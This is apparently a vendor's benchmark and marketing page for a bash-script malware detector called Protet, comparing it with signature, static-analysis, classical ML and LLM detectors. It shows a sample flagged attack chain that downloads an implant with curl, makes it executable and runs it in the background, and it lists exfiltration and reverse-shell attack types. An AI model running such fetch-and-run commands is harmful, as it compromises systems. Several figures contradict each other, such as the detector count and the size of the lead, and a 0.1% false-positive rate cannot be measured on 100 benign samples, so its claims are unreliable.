Detection Benchmark · April 2026

Protet Detection Benchmark

Bash Script Malware Detection — Independent Evaluation

90% detection rate at 0.1% false positive rate. Where every other tool fails, Protet detects.

Protet achieves 90% true positive rate at a 0.1% false positive rate on bash script malware detection — outperforming every compared approach by a wide margin. On the hardest category of attacks (sparse malicious payloads hidden in legitimate-looking scripts), Protet maintains 85% detection while rule-based tools score 0% and the best classical ML baseline drops to 40%.

90%

TPR @ 0.1% FPR
Full test set (n=200)

85%

TPR @ 0.1% FPR
Sparse stealthy attacks (n=120)

+45pp

Lead over best alternative
on sparse attacks

Claude Sonnet 4.6 TPR
on sparse attacks

Results

Detection rates at fixed false-positive rates

Nine detectors across five categories — signature-based AV, rule-based tools, static analysis, classical ML, and a state-of-the-art LLM — evaluated on an identical held-out test set of 200 samples. Primary operating point: FPR = 0.1% (1 false alert per 1,000 benign scripts).

all — full test set (n = 200, 100 malicious + 100 benign)

sparse_window — stealthy attacks with <5% malicious commands (n = 120, 20 malicious + 100 benign)

Detector	Partition	n	TPR @ 0.1% FPR ★	TPR @ 1% FPR	TPR @ 5% FPR	Verdict
ClamAV Signature-based AV	all	200	7%	7%	7%	Ineffective
	sparse	120	0%	0%	0%	Ineffective
YARA Rule-based pattern matching	all	200	0%	0%	0%	Ineffective
	sparse	120	0%	0%	0%	Ineffective
ShellCheck Static analysis linter	all	200	0%	0%	5%	Ineffective
	sparse	120	0%	0%	10%	Ineffective
Semgrep (p/bash) Static analysis / SAST	all	200	0%	0%	0%	Ineffective
	sparse	120	0%	0%	0%	Ineffective
Claude Sonnet 4.6 LLM — zero-shot	all	200	2%	2%	2%	Ineffective
	sparse	120	0%	0%	0%	Ineffective
TF-IDF + Random Forest Classical ML	all	200	36%	43%	69%	Moderate
	sparse	120	20%	20%	65%	Moderate
TF-IDF + Logistic Regression Classical ML — best non-Protet	all	200	54%	68%	80%	Moderate
	sparse	120	20%	40%	65%	Moderate
Protet Protet — purpose-built detector	all	200	90%	90%	90%	Best-in-class
	sparse	120	85%	85%	85%	Best-in-class

★ Primary operating point. TPR = fraction of malicious samples correctly flagged. FPR = fraction of benign samples incorrectly flagged. Each FPR column is an independent threshold — chosen per detector to hit exactly that FPR on the benign subset. Protet's identical scores across all three FPR thresholds indicate bimodal, highly confident decisions.

Key takeaway: At FPR = 0.1% — 1 false alert per 1,000 benign scripts — Protet catches 90 of 100 malicious samples. The next best approach (TF-IDF + Logistic Regression) catches 54. On the sparse partition, TF-IDF+LR drops to 20% while Protet holds at 85%. Claude Sonnet 4.6, despite a security-specialist prompt explicitly designed for sparse payload detection, scores 0% on sparse attacks.

Competitive Gap

The margin over every alternative

vs best alternative — full dataset

+36pp

Protet 90% vs TF-IDF+LR 54% at FPR=0.1%.
A +67% relative improvement in detection rate.

vs best alternative — sparse attacks

+65pp

Protet 85% vs TF-IDF+LR 20% at FPR=0.1%.
A +325% relative improvement — the hardest scenario.

vs Claude Sonnet 4.6

+88pp

Protet 90% vs Claude Sonnet 2% at FPR=0.1%.
A state-of-the-art LLM with an expert prompt is not a viable substitute for a purpose-trained detector.

Real-World Incidents

These are the attacks this benchmark is designed around

The sparse_window partition — the hardest test category — directly models the attack structure of three major real-world incidents. In each case, the malicious payload was a tiny fraction of an otherwise legitimate script. Signature-based tools scored 0%. Protet scores 85%.

Codecov (2021) · CISA Advisory

One curl line injected into a 400-line legitimate CI uploader script. Ran silently for two months across CI pipelines at Twilio, HashiCorp, Confluent, and the U.S. DHS. Payload density: ~0.25%. This is the defining sparse payload attack. ClamAV, YARA, and Semgrep score 0% on this structure. Protet detects the sequence.

tj-actions/changed-files (March 2025)

Malicious shell code injected into a GitHub Actions step used by 23,000 repositories. Dumped CI runner memory including secrets to workflow logs. One malicious step in an otherwise normal pipeline. The payload was the only anomalous element — invisible to tools that look at individual commands in isolation.

XZ Utils (March 2024 · CVE-2024-3094)

Backdoor hidden in Autoconf and bash build scripts for two years. Nearly reached every glibc Linux system globally. Caught accidentally by a human noticing SSH slowness — not by any security tool. Zero signatures existed. Zero rules fired. The malicious behaviour was distributed across seemingly innocent build steps.

The pattern is consistent: malicious payload hidden inside a script that is 95–99% legitimate. No signature matches. No rule fires. The only detection path is sequence-aware classification — reading the full context rather than pattern-matching individual commands.

Threat Context

Why sparse payloads are the hardest problem

Modern supply chain and infrastructure attacks increasingly rely on malicious code injected into otherwise legitimate shell scripts. A single malicious command — a reverse shell, a credential exfiltration call, a persistence hook — can be buried among dozens of benign commands, making detection extremely difficult for tools that look for known signatures or obvious patterns.

The core challenge: When a malicious script contains only 1–5% malicious commands by volume, it is virtually indistinguishable from a normal script to the naked eye — and to most security tools. The test set reflects this reality: the median malicious window contains just 1 malicious command out of ~12 total (7.9% density).

Attack types in the dataset

→Data exfiltration (credentials, SSH keys, environment variables)
→Reverse shells and command-and-control callbacks
→Persistence mechanisms (cron jobs, systemd hooks, bashrc injection)
→Supply chain implants injected into CI/CD pipeline scripts
→Obfuscated payload execution (base64 decode + eval, curl-pipe-bash)

Sparsity distribution — malicious samples

Malicious command fraction per window (n=100 malicious samples):

p10

1.4%

p25

5.7%

median

7.9%

p75

12.9%

max

17.1%

Window size: ~40 top-level commands. Sparse window threshold: <5% (<2 malicious commands).

Key Findings

What this benchmark proves

1
Rule-based tools are structurally blind to novel malware. ClamAV, YARA, Semgrep, and ShellCheck score 0–7% — they require prior knowledge of the exact malware signature. Novel or lightly modified payloads evade detection entirely.
2
Classical ML degrades under sparsity. TF-IDF+LR reaches 68% overall but drops to 40% on sparse attacks — a –28pp gap. When the malicious signal is diluted by surrounding benign commands, token frequency loses its discriminative power.
3
Claude Sonnet 4.6 scores 2% overall and 0% on sparse attacks. General intelligence does not substitute for task-specific training. The prompt explicitly warned about sparse payloads — this is not a prompt engineering failure, it is a fundamental limitation of zero-shot classification on this distribution.
4
Protet achieves 90% TPR@0.1% FPR overall and 85% on sparse attacks. A +65pp lead over the best alternative on the hardest partition. Sparsity is not a weakness — Protet was trained specifically to detect malicious intent within mixed-content windows regardless of surrounding benign noise.
5
Protet's decisions are highly confident. Identical scores at 0.1%, 1%, and 5% FPR indicate a bimodal score distribution — Protet is rarely ambiguous, minimising alert noise for SOC teams operating at any threshold.

Beyond the Verdict

Detection rate is one number. The attack chain is the other.

A 90% detection rate means Protet catches 9 in 10 attacks. When it fires, it also returns the exact commands that form the attack chain — extracted from the surrounding legitimate activity — so your analyst knows what to investigate before opening a terminal.

Example: Deployment hijack (Scenario 6)

MALICIOUS  ·  score 0.91
Flagged commands — the attack chain
/tmp/.nginx-cache &
curl -s …/implant -o /tmp/.nginx-cache
chmod +x /tmp/.nginx-cache
Remaining 16 commands — benign
npm ci --prefer-offline
systemctl reload nginx
… 14 more
3 of 19 commands identified as the attack chain.

The analyst gets evidence, not just an alert

In this scenario, 16 of 19 commands are legitimate deployment operations. Protet surfaces the three commands that form the attack chain — the implant download, the chmod, and the background execution — while ignoring the surrounding noise.

Attach to tickets directly

The /explain endpoint returns structured JSON. The flagged command list is machine-readable and suitable for attaching to PagerDuty incidents, Jira tickets, or Slack alerts — giving on-call engineers immediate context without requiring shell access to the affected pod.

Try it yourself: The live demo on the homepage calls the real /explain endpoint. Select any scenario, click Analyse, and see the actual flagged commands returned by the API.

Methodology

How the benchmark was run

All eight detectors were evaluated on an identical held-out test set. No detector had access to test data during training or rule development.

Setup

Dataset

Real-world bash scripts from public repositories and known malware corpora. Test set: 200 samples (100 malicious, 100 benign).

Train/test split at the original script level — no script appears in more than one split. TF-IDF baselines were trained on the same training partition as Protet.

Metric: TPR @ Fixed FPR

Rather than a single accuracy number, the benchmark uses TPR at fixed FPR operating points: 0.1%, 1.0%, and 5.0%.

For each detector, the ROC curve is computed and TPR is read at the threshold that produces exactly the target FPR on the benign subset. FPR=0.1% is the primary reporting point — 1 false alert per 1,000 benign scripts.

Detectors

ClamAV & YARA

ClamAV: signatures updated with freshclam before the run. Score = binary (exit code). TPR is identical at all FPR thresholds — no probability score to sweep.

YARA: two community repositories (Neo23x0/signature-base, reversinglabs-yara-rules). Score = fraction of rule files matching. Zero detections across all thresholds.

Static Analysis — ShellCheck & Semgrep

ShellCheck: issue count per script. Semgrep: number of p/bash rule matches. Both target code quality and known vulnerability patterns — not the behavioural signatures of active malware.

Malicious code is frequently syntactically valid and follows correct bash conventions, making these tools structurally unable to detect attacker intent.

TF-IDF Baselines — LR & RF

Trained on the same split as Protet. Hyperparameters tuned for bash code: non-whitespace tokenization, bigrams, sublinear TF scaling, 100k feature vocabulary.

Token frequency is a useful signal when malicious density is high — specific commands and flag combinations correlate with intent. Performance degrades sharply on sparse windows where the signal is diluted by surrounding benign content.

Protet

Production model loaded from MLflow Model Registry via the champion alias. A sequence-aware classifier fine-tuned on real-world attack chains, trained specifically to detect malicious intent within mixed-content windows.

Input: pre-computed embedding vectors per script window. Output: positive-class probability score for continuous ROC sweep.

LLM Evaluation

Claude Sonnet 4.6

Zero-shot classification at temperature=0 with a security-specialist system prompt. Score = confidence if malicious=true, else 1−confidence, enabling a continuous ROC sweep.

The prompt was deliberately maximalist — explicitly instructing the model to look for sparse payloads and treat any single malicious command as sufficient for a positive verdict. Results represent best-case zero-shot performance, not a prompt engineering failure.

System prompt (verbatim)

You are a security analyst specializing in shell script malware detection. You will be given a bash script window that may contain a small number of malicious commands mixed among benign ones. Even a single malicious command makes the whole window malicious. Look carefully for: data exfiltration, reverse shells, credential theft, persistence mechanisms, obfuscated execution, and unusual network activity. Respond with JSON only, no other text: {"malicious": true/false, "confidence": 0.0-1.0} Use confidence=1.0 when certain, 0.5 when genuinely unsure.

Notes

All detectors were evaluated on the same held-out test set, never seen during any part of Protet training.
Train/test split was performed at the original script level to prevent data leakage.
TF-IDF baselines were trained on the same training partition as Protet for a fair comparison.
FPR is computed over benign scripts only; TPR over malicious scripts only.
The sparse_window partition contains all 100 benign samples and approximately 20 malicious samples with <5% malicious command density.
ClamAV signatures were refreshed immediately before evaluation. YARA rules sourced from Neo23x0/signature-base and reversinglabs-yara-rules.
Claude Sonnet 4.6 evaluated at temperature=0 with a security-specialist system prompt explicitly designed to maximise detection sensitivity on sparse payloads.

Add Protet to your detection stack

Free SaaS API. No infrastructure changes required. 90% detection where every other tool fails.

Get API Key → Read the Docs